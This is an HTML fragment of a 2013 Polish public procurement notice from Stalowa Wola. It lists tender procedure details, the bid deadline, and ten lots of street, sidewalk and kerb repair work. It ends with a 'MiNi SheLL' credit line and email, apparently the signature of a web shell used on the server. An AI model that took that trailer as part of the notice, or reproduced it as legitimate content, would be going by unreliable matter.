zamówień publicznych - Załącznik nr 8.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.stalowawola.pl/?c=mdPrzetargi-cmPokaz-1203<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Stalowa Wola ul. Wolności 7, 37-450 Stalowa Wola pokój nr 9.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.07.2013 godzina 12:00, miejsce: Urząd Miasta Stalowa Wola ul. Wolności 7, 37-450 Stalowa Wola pokój nr 9.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Remont cząstkowy ulic miejskich o nawierzchni bitumicznej w Stalowej Woli przy użyciu mieszanki mineralno-bitumicznej /na gorąco/ wytwarzanej w wytwórni mas bitumicznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Remont cząstkowy ulic miejskich o nawierzchni bitumicznej w Stalowej Woli
przy użyciu mieszanki mineralno-bitumicznej /na gorąco/ wytwarzanej w wytwórni
mas bitumicznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Remont cząstkowy ulic miejskich o nawierzchni bitumicznej w Stalowej Woli przy użyciu mieszanki mineralno - bitumicznej wbudowywanej /na zimno/..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Remont cząstkowy ulic miejskich o nawierzchni bitumicznej w Stalowej Woli
przy użyciu mieszanki mineralno - bitumicznej wbudowywanej /na zimno/..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonywanie nakładek z mieszanki mineralno - bitumicznej o gr. 5cm..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonywanie nakładek z mieszanki mineralno - bitumicznej o gr. 5cm..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Mechaniczne klinowanie nawierzchni tłuczniowych z wcześniejszym wyrównaniem równiarką - ułożenie warstwy klińca gr 5 cm przy pomocy rozściełacza
mas bitumicznych z zawałowaniem..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mechaniczne klinowanie nawierzchni tłuczniowych z wcześniejszym wyrównaniem
równiarką - ułożenie warstwy klińca gr 5 cm przy pomocy rozściełacza
mas bitumicznych z zawałowaniem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wykonanie koryta wraz z podbudową z kruszywa łamanego stabilizowanego mechanicznie o gr 15 cm..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie koryta wraz z podbudową z kruszywa łamanego stabilizowanego
mechanicznie o gr 15 cm..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Wykonanie przypowierzchniowej regulacji studzienek kanalizacji (studzienka
rewizyjna, wpust uliczny - w przypadku braku pierścienia odciążającego uzupełnić,
w przypadku uszkodzeń włazu lub wypustu należy wymienić na nowy) z rozebraniem
i odtworzeniem nawierzchni..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie przypowierzchniowej regulacji studzienek kanalizacji (studzienka
rewizyjna, wpust uliczny - w przypadku braku pierścienia odciążającego uzupełnić,
w przypadku uszkodzeń włazu lub wypustu należy wymienić na nowy) z rozebraniem
i odtworzeniem nawierzchni..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.21.30-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Rozebranie starej nawierzchni chodnika z kostki brukowej wraz z ułożeniem
nowej o grubości 6 cm z kostki brukowej na podsypce cementowo-piaskowej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rozebranie starej nawierzchni chodnika z kostki brukowej wraz z ułożeniem
nowej o grubości 6 cm z kostki brukowej na podsypce cementowo-piaskowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.50-6, 45.11.11.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Rozebranie starej nawierzchni chodnika z płytek chodnikowych o wymiarach
50x50x7 lub 35x35x5 wraz z ułożeniem nowej o grubości 6 cm z kostki brukowej
na podsypce cementowo-piaskowej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rozebranie starej nawierzchni chodnika z płytek chodnikowych o wymiarach
50x50x7 lub 35x35x5 wraz z ułożeniem nowej o grubości 6 cm z kostki brukowej
na podsypce cementowo-piaskowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.50-6, 45.11.11.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Rozebranie krawężników betonowych o wymiarach 15x30x100 wraz z ułożeniem
nowych krawężników na ławie betonowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rozebranie krawężników betonowych o wymiarach 15x30x100 wraz z ułożeniem
nowych krawężników na ławie betonowej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.52-0, 45.11.11.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Wykonanie warstwy rumoszu asfaltowego lub kruszywa drogowego o grubości
5 cm przy pomocy rozściełacza mas bitumicznych z zawałowaniem (materiał Zamawiającego)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie warstwy rumoszu asfaltowego lub kruszywa drogowego o grubości
5 cm przy pomocy rozściełacza mas bitumicznych z zawałowaniem (materiał Zamawiającego)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com